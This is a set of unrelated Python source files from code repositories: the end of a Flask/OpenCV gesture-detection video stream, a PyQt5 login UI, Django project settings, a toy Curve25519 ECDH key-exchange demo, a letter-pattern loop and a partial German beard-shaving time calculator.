pred[..., 0] = (_sigmoid(pred[..., 0]) + np.tile(range(w), (3, h)).transpose((1, 0))) / w
pred[..., 1] = (_sigmoid(pred[..., 1]) + np.tile(np.repeat(range(h), w), (3, 1)).transpose((1, 0))) / h
pred[..., 2] = np.exp(pred[..., 2]) * anchors[:, 0:1].transpose((1, 0)) / w
pred[..., 3] = np.exp(pred[..., 3]) * anchors[:, 1:2].transpose((1, 0)) / h
bbox = np.zeros((h * w, 3, 4))
bbox[..., 0] = np.maximum((pred[..., 0] - pred[..., 2] / 2.0 - shift_x_ratio) * x_scale * img_w, 0) # x_min
bbox[..., 1] = np.maximum((pred[..., 1] - pred[..., 3] / 2.0 - shift_y_ratio) * y_scale * img_h, 0) # y_min
bbox[..., 2] = np.minimum((pred[..., 0] + pred[..., 2] / 2.0 - shift_x_ratio) * x_scale * img_w, img_w) # x_max
bbox[..., 3] = np.minimum((pred[..., 1] + pred[..., 3] / 2.0 - shift_y_ratio) * y_scale * img_h, img_h) # y_max
# print('bbox', bbox)
pred[..., :4] = bbox
pred = pred.reshape((-1, 5 + class_num))
# pred[:, 4] = np.max(pred[:, 5:], axis=-1)
pred[:, 4] = pred[:, 4] * pred[:, 5:].max(1)
pred[:, 5] = np.argmax(pred[:, 5:], axis=-1)
pred = pred[pred[:, 4] >= 0.2]
print('pred[:, 5]', pred[:, 5])
print('pred[:, 5] shape', pred[:, 5].shape)
# pred = pred[pred[:, 4] >= conf_threshold]
all_boxes = [[] for ix in range(class_num)]
for ix in range(pred.shape[0]):
box = [int(pred[ix, iy]) for iy in range(4)]
box.append(int(pred[ix, 5]))
box.append(pred[ix, 4])
all_boxes[box[4] - 1].append(box)
# print('all_boxes', all_boxes)
return all_boxes
def convert_labels(label_list):
if isinstance(label_list, np.ndarray):
label_list = label_list.tolist()
label_names = [labels[int(index)] for index in label_list]
return label_names
def construct_image_info():
"""construct image info"""
image_info = np.array([MODEL_WIDTH, MODEL_HEIGHT,
MODEL_WIDTH, MODEL_HEIGHT],
dtype = np.float32)
return image_info
def post_process(infer_output, origin_img):
"""postprocess"""
print("post process")
box_num = infer_output[1][0, 0]
print(infer_output[1][0, 0])
print("box num ", box_num)
box_info = infer_output[0].flatten()
scalex = origin_img.width / MODEL_WIDTH
delta = (MODEL_HEIGHT - int(origin_img.height * 416/640)) // 2 #91
print(delta)
scaley = origin_img.height / MODEL_HEIGHT
# if scalex > scaley:
# scaley = scalex
draw = ImageDraw.Draw(origin_img)
font = ImageFont.load_default()
for n in range(int(box_num)):
ids = int(box_info[5 * int(box_num) + n])
label = labels[ids]
score = box_info[4 * int(box_num)+n]
top_left_x = box_info[0 * int(box_num)+n] * scalex
top_left_y = (box_info[1 * int(box_num)+n]-delta)/234*360
bottom_right_x = box_info[2 * int(box_num) + n] * scalex
bottom_right_y = (box_info[3 * int(box_num) + n]-delta)/234*360
draw.line([(top_left_x, top_left_y), (bottom_right_x, top_left_y), (bottom_right_x, bottom_right_y), \
(top_left_x, bottom_right_y), (top_left_x, top_left_y)], fill=(0, 200, 100), width=5)
draw.text((top_left_x, top_left_y), label, font=font, fill=255)
num=0
if box_num==1:
        xpt=(top_left_x+bottom_right_x)/2 # x of the green box's center point
        ypt=(top_left_y+bottom_right_y)/2 # y of the green box's center point
        w = origin_img.size[0] # image width
        h = origin_img.size[1] # image height
# print(w)
# print(h)
        if 0<=ypt<(1/3)*h and ypt < (h/w)*xpt and ypt < -(h/w)*xpt+h:
            # print("forward!")
            # print(f"digital signal {num}")
            #draw.text((xpt, ypt), "forward", font=font, fill=255)
            num=0
        elif 0 <= xpt < (1/3)*w and (h/w)*xpt <= ypt <= -(h/w)*xpt+h:
            # print("turn right!")
            # print(f"digital signal {num}")
            #draw.text((xpt, ypt), "turn left", font=font, fill=255)
            num=1
        elif ypt > (h/w)*xpt and ypt>-(h/w)*xpt+h and (2/3)*h < ypt <= h:
            # print("backward!")
            # print(f"digital signal {num}")
            #draw.text((xpt, ypt), "backward", font=font, fill=255)
            num=2
        elif (2/3)*w < xpt <= w and -(h/w)*xpt+h <= ypt <= (h/w)*xpt:
            # print("turn left!")
            # print(f"digital signal {num}")
            #draw.text((xpt, ypt), "turn right", font=font, fill=255)
            num=3
        elif (1/3)*w <= xpt <= (2/3)*w and (1/3)*h <= ypt <= (2/3)*h:
            # print("stop!")
            # print(f"digital signal {num}")
            #draw.text((xpt, ypt), "stop", font=font, fill=255)
            num=4
        else:
            print("error")
    else:
        # print("nothing recognized")
        # print(f"digital signal {num}")
        num=4
return origin_img,num
def frameprocessing(frame):
w=640
h=360
    frame = cv2.flip(frame, 1) # mirror the frame horizontally
image_info = construct_image_info()
data, orig = preprocess(frame)
result_list = model.execute([data,image_info])
# ret = acl.rt.synchronize_stream(0)
print(result_list)
image1 = Image.fromarray(cv2.cvtColor(frame,cv2.COLOR_BGR2RGB))
afterframe,num = post_process(result_list,image1)
afterframe = cv2.cvtColor(np.asarray(afterframe),cv2.COLOR_RGB2BGR)
    a = int(w/3)   # one third of the width
    b = int(2*w/3) # two thirds of the width
    c = int(h/3)   # one third of the height
    d = int(2*h/3) # two thirds of the height
e = int(w/3)+3
f = int(2*w/3)-3
cv2.line(afterframe, (0,0), (a,c), (0, 0, 255), 2)
cv2.line(afterframe, (a,c), (b,c), (0, 0, 255), 2)
cv2.line(afterframe, (b,c), (w,0), (0, 0, 255), 2)
cv2.line(afterframe, (a,c), (a,d), (0, 0, 255), 2)
cv2.line(afterframe, (a,d), (0,h), (0, 0, 255), 2)
cv2.line(afterframe, (a,d), (b,d), (0, 0, 255), 2)
cv2.line(afterframe, (b,d), (w,h), (0, 0, 255), 2)
    cv2.line(afterframe, (b,c), (b,d), (0, 0, 255), 2) # the eight red lines above mark out the command zones
cv2.line(afterframe, (e,0), (f,0), (0, 255, 0), 2)
cv2.line(afterframe, (e,h), (f,h), (0, 255, 0), 2)
cv2.line(afterframe, (e,0), (e,h), (0, 255, 0), 2)
cv2.line(afterframe, (f,0), (f,h), (0, 255, 0), 2)
return afterframe
def gen_frames(): # generate frame by frame from camera
while True:
# Capture frame-by-frame
success, frame = camera.read() # read the camera frame
# frame, num=ff.frameprocessing(frame)
if not success:
break
else:
            frame = frameprocessing(frame)  # overlay detection results and zone lines
ret, buffer = cv2.imencode('.jpg', frame)
# ret, buffer = cv2.imencode('.jpg', fram)
frame = buffer.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n') # concat frame one by one and show result
@app.route('/video_feed')
def video_feed():
#Video streaming route. Put this in the src attribute of an img tag
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
def tttt():
fram = cv2.imread('/home/YJS/111/1.jpg')
frame=frameprocessing(fram) ###############
cv2.imwrite('/home/YJS/111/4.jpg',frame)
if __name__ == '__main__':
# tttt()
app.run(host="0.0.0.0",debug=True)
# fram = cv2.imread('/home/YJS/111/1.jpg')
# frame=frameprocessing(fram) ###############
# cv2.imwrite('/home/YJS/111/3.jpg',frame)
| [
"[email protected]"
] | |
fe5afc9879b959e3ea8af568f5faa66bfaa6b37f | 2bfefffbc80dde1ff6996a4c6da28a35a93bcfc1 | /ML_App/prediction.py | 7ff59a89bcbff012827803f43760b7801439b8bc | [] | no_license | Gozdescientist/Machine_Learning_app | 16679b22be56e2c44a54d74b5f1c9aa41584a7dd | 99716f145cb9cac89932d156720791bb89de4d58 | refs/heads/main | 2022-12-20T13:40:00.769806 | 2020-10-05T07:56:34 | 2020-10-05T07:56:34 | 300,936,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,448 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'prediction.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1066, 694)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/icons/bars.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setStyleSheet("#centralwidget{\n"
"border-image: url(:/icons/icons/main.png);\n"
"}")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("Segoe Print")
font.setPointSize(25)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.verticalLayout_4.addWidget(self.label_3)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
spacerItem1 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.horizontalLayout_2.addItem(spacerItem1)
self.formFrame = QtWidgets.QFrame(self.centralwidget)
self.formFrame.setMinimumSize(QtCore.QSize(400, 220))
self.formFrame.setMaximumSize(QtCore.QSize(16777215, 100))
self.formFrame.setStyleSheet("#formFrame{\n"
"background-color: rgb(255, 255, 255);\n"
"border-radius: 10px\n"
"}")
self.formFrame.setObjectName("formFrame")
self.formLayout = QtWidgets.QFormLayout(self.formFrame)
self.formLayout.setObjectName("formLayout")
self.label = QtWidgets.QLabel(self.formFrame)
self.label.setMaximumSize(QtCore.QSize(16777215, 300))
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.label)
self.lineEdit_username = QtWidgets.QLineEdit(self.formFrame)
self.lineEdit_username.setMinimumSize(QtCore.QSize(0, 30))
self.lineEdit_username.setObjectName("lineEdit_username")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.lineEdit_username)
self.label_2 = QtWidgets.QLabel(self.formFrame)
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName("label_2")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.label_2)
self.lineEdit_password = QtWidgets.QLineEdit(self.formFrame)
self.lineEdit_password.setMinimumSize(QtCore.QSize(0, 30))
self.lineEdit_password.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEdit_password.setObjectName("lineEdit_password")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.lineEdit_password)
self.label_4 = QtWidgets.QLabel(self.formFrame)
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.label_4)
self.PushButton_signup = QtWidgets.QPushButton(self.formFrame)
self.PushButton_signup.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.PushButton_signup.setFont(font)
self.PushButton_signup.setStyleSheet("color: rgb(0, 0, 0);\n"
"border-right-color: rgb(0, 0, 0);\n"
"border-color: rgb(85, 0, 255);\n"
"background-color: rgb(174, 229, 183);\n"
"border-radius: 10px\n"
"")
self.PushButton_signup.setObjectName("PushButton_signup")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.PushButton_signup)
self.horizontalLayout_2.addWidget(self.formFrame)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem2)
self.verticalLayout_4.addLayout(self.horizontalLayout_2)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem3)
spacerItem4 = QtWidgets.QSpacerItem(20, 120, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.horizontalLayout.addItem(spacerItem4)
self.PushButton_login = QtWidgets.QPushButton(self.centralwidget)
self.PushButton_login.setMinimumSize(QtCore.QSize(150, 70))
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.PushButton_login.setFont(font)
self.PushButton_login.setStyleSheet("color: rgb(0, 0, 0);\n"
"border-right-color: rgb(0, 0, 0);\n"
"border-color: rgb(85, 0, 255);\n"
"background-color: rgb(75, 150, 225);\n"
"border-radius: 10px\n"
"")
self.PushButton_login.setObjectName("PushButton_login")
self.horizontalLayout.addWidget(self.PushButton_login)
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem5)
self.verticalLayout_4.addLayout(self.horizontalLayout)
self.label_5 = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(8)
font.setBold(True)
font.setItalic(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setStyleSheet("")
self.label_5.setObjectName("label_5")
self.verticalLayout_4.addWidget(self.label_5)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1066, 26))
self.menubar.setObjectName("menubar")
self.menuApplication = QtWidgets.QMenu(self.menubar)
self.menuApplication.setObjectName("menuApplication")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionExit = QtWidgets.QAction(MainWindow)
self.actionExit.setObjectName("actionExit")
self.menuApplication.addAction(self.actionExit)
self.menubar.addAction(self.menuApplication.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Welcome!!"))
self.label_3.setText(_translate("MainWindow", "Machine Learning Predictions"))
self.label.setText(_translate("MainWindow", "Username"))
self.label_2.setText(_translate("MainWindow", "Password"))
self.label_4.setText(_translate("MainWindow", "Don\'t have an account?"))
self.PushButton_signup.setText(_translate("MainWindow", "SignUp"))
self.PushButton_login.setText(_translate("MainWindow", "Login"))
self.label_5.setText(_translate("MainWindow", "This application aims to analyze the business processes of different departments of the Group Company and obtain various predictions. All rights reserved."))
self.menuApplication.setTitle(_translate("MainWindow", "Application"))
self.actionExit.setText(_translate("MainWindow", "Exit"))
import icons_rc
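# icons_rc is the Qt resource module compiled from the project's .qrc file
# (typically generated with pyrcc5).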
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
b8b5d53aedd215e4c38db5455b764f4b73bb83b5 | 3420aba3622faf2d4aede984c656f68ad24a1f3c | /backend/personal_care_22730/settings.py | 230da7088fe365290e5935afd842c015a2ea9d7d | [] | no_license | crowdbotics-apps/personal-care-22730 | bb81af122e64cb58f6d52df31df328b6dfa4b25d | 066d2cd5e890057df054ea7c5b3b5f061e872371 | refs/heads/master | 2023-01-11T06:30:05.971088 | 2020-11-18T16:23:30 | 2020-11-18T16:23:30 | 313,990,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,048 | py | """
Django settings for personal_care_22730 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.sites",
"healthcare",
]
LOCAL_APPS = [
"home",
"users.apps.UsersConfig",
]
THIRD_PARTY_APPS = [
"rest_framework",
"rest_framework.authtoken",
"rest_auth",
"rest_auth.registration",
"bootstrap4",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"drf_yasg",
"storages",
# start fcm_django push notifications
"fcm_django",
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "personal_care_22730.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "personal_care_22730.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {"default": env.db()}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
MIDDLEWARE += ["whitenoise.middleware.WhiteNoiseMiddleware"]
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
and AWS_STORAGE_BUCKET_NAME
and AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = "/mediafiles/"
MEDIA_ROOT = os.path.join(BASE_DIR, "mediafiles")
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning(
"You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails."
)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
2b05106d3a46f169272d1e3f9813b03703458746 | 842c0fd117d1bf0502988ae960c174a598d72584 | /ecdh.py | 610756bf66b689a00a18c59c923b5f542fd32cb5 | [] | no_license | ThomasB123/ecc | e41ab8314ef38ff11583cdf816b2c059e9e455cf | 45d8585263bf29f922ee94d3d588e71ecf41fbeb | refs/heads/main | 2023-06-14T22:07:36.010246 | 2021-07-13T16:44:31 | 2021-07-13T16:44:31 | 304,315,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,678 | py |
def binary(num): # convert a denary number to a list of bits, least significant first
out = []
while num > 0:
if num % 2 == 1:
num -= 1
out.append(1)
else:
out.append(0)
        num //= 2 # integer halving; '/' would go through floats and lose precision for large keys
return out
def move(xa,ya,xb,yb):
if [xa,ya] == [xb,yb]:
# doubling a point
m = ((3*xa**2+a)*pow(2*ya,p-2,p)) % p # (3x^2+a)/(2y) % p
else:
# adding two points
m = ((yb-ya)*pow(xb-xa,p-2,p)) % p # (yb-ya)/(xb-xa) % p
xd = (m**2 -xa-xb) % p
yd = (m*(xa-xd) - ya) % p
return xd,yd
def K(start,k):
points = [start]
bina = binary(k)
    for i in range(len(bina)-1): # build points[i] = (2**i)g up to the most significant bit
points.append(move(points[-1][0],points[-1][1],points[-1][0],points[-1][1])) # double
    index = bina.index(1) # find first occurrence of 1 in the binary representation
out = points[index] # start with smallest multiple of g
for i in range(index+1,len(bina)): # count up from the smallest multiple
if bina[i] == 1:
out = move(out[0],out[1],points[i][0],points[i][1])
return out
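# Example of the double-and-add decomposition K implements:
# k = 13 = 0b1101, so 13g = 8g + 4g + 1g, assembled from repeated doublings of g.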
def montgomery(a,b): # convert from montgomery to short weierstrass
# a = (3 - a^2)/(3b^2) and b = (2a^3 - 9a)/(27b^3)
    return (3-a**2)*pow(3*b**2,p-2,p) % p, (2*a**3-9*a)*pow(27*b**3,p-2,p) % p # reduced mod p
def edwards(d): # convert from edwards to short weierstrass
# a = 2(1 + d)/(1 - d) and b = 4/(1 - d)
return montgomery(2*(1+d)*pow(1-d,p-2,p),4*pow(1-d,p-2,p))
# public parameters: p,a,b,g
# Curve25519
print('You are using Curve25519')
p = 2**255 - 19
a,b = montgomery(486662,1)
g = (9,14781619447589544791020593568409986887264606134616475288964881837755586237401)
print('Equation of curve: y^2 = x^3 + 486662x^2 + x mod 2^255 - 19')
print('Starting point g = {}'.format(g))
print()
# Change private keys here
#####################################
# private keys 2 <= ka,kb <= p-2
ka = 2**200-1 # Alice private key
kb = 2**210-1 # Bob private key
#####################################
print('Alice computes A = (ka)g mod p')
A = K(g,ka) # Alice calculation
print('A = {}\n'.format(A))
print('Alice sends A to Bob\n')
print('Bob computes B = (kb)g mod p')
B = K(g,kb) # Bob calculation
print('B = {}\n'.format(B))
print('Bob sends B to Alice\n')
# Bob sends B to Alice
print('Alice computes K = (ka)B mod p = (ka.kb)g mod p')
k = K(B,ka) # Alice calculation
print('K = {}\n'.format(k))
# Alice sends A to Bob
print('Bob computes K = (kb)A mod p = (kb.ka)g mod p')
k = K(A,kb) # Bob calculation
print('K = {}\n'.format(k))
# Alice and Bob now know the same K
print('Alice and Bob now know the same K\n')
print('x-coordinate used as secret value')
print('Secret value = {}\n'.format(k[0]))
| [
"[email protected]"
] | |
b4215825da1da85f06424f250276cdaa31fbf895 | 91bcf9bdbe35a9ea450f2a9792ec092dd9146d83 | /loop45.py | 3186c1fb626842967571458dc24712d9880ffbe8 | [] | no_license | degavathmamatha/LOOP_PY | c2c495966dc82750c6ff33276dedd308d97e8ba2 | 354a613513c784860aa6ec5a27e7a3901a91c2fb | refs/heads/main | 2023-05-17T15:19:53.807678 | 2021-06-02T17:06:06 | 2021-06-02T17:06:06 | 373,244,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | i=69
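# Prints a descending triangle of letters from chr(69)='E' down to chr(65)='A':
# row for code i repeats its letter (i-64) times, i.e. E E E E E / D D D D / ... / A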
while i>=65:
j=65
while j<=i:
print(chr(i),end=" ")
j=j+1
i=i-1
print() | [
"[email protected]"
] | |
8bff23b2e9efc484a7dafa78905b9ed3efde7cac | 04d9640857ee86879bdf10147863c484ac520f06 | /main.py | d909d80047c65aac58b19f9486a3f6bc47986c5b | [
"CC0-1.0"
] | permissive | fretless1/beard-respite | f3b05c9c558f751160ebfd3ede7d13da919d656b | be18f4231fee31606d4f71e0a12cf6ef04c7e870 | refs/heads/main | 2023-05-10T01:36:33.274741 | 2021-05-31T17:21:01 | 2021-05-31T17:21:01 | 372,528,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,664 | py | import math
print("Mit diesem Rechner kannst du eine beliebige Bedenkzeit vor der Rasur deines Bartes berechnen.")
# total time (Gesamtzeit) = growth time (Wachstumszeit) + reflection time (Bedenkzeit) = growth time + (growth time / lead time)
print()
# number of days of beard growth since the last shave
g = float(input("Gib hier die Anzahl der Tage ein, die vergangen sind seit du dich das letzte Mal rasiert hast: "))
# lead time (Vorlaufzeit): growth days required per day of reflection time
v = float(input("Gib hier die Anzahl der Tage für die Vorlaufzeit ein, die für einen Tag Bedenkzeit nötig ist: "))
# "addtime" berechnet die Bedenkzeit c in Abhängigkeit von der Vorlaufzeit b
def addtime(a, b):
c = a / b
return c
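# Example with sample inputs: g = 30 growth days and v = 5 lead-time days per
# reflection day give addtime(30, 5) = 6 reflection days and 30 + 6 = 36 days total.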
# choose singular/plural "Jahr"/"Jahre" for the output
if math.floor(g / 360) == 1:
    y = " Jahr"
else:
    y = " Jahre"
# choose singular/plural "Monat"/"Monate" for the output
if math.floor(g % 360) == 30:
    m = " Monat"
else:
    m = " Monate"
# choose singular/plural "Tag"/"Tage" for the output
if v == 1 or math.floor(g % 30) == 1:
    d = " Tag"
else:
    d = " Tage"
# choose singular/plural "Stunde"/"Stunden" for the output
if math.floor((g * 24) % 24) == 1:
    h = " Stunde"
else:
    h = " Stunden"
# choose singular/plural "Minute"/"Minuten" for the output
if math.floor((((g * 24) % 24) * 60) % 60) == 1:
    mi = " Minute"
else:
    mi = " Minuten"
# choose singular/plural "Sekunde"/"Sekunden" for the output
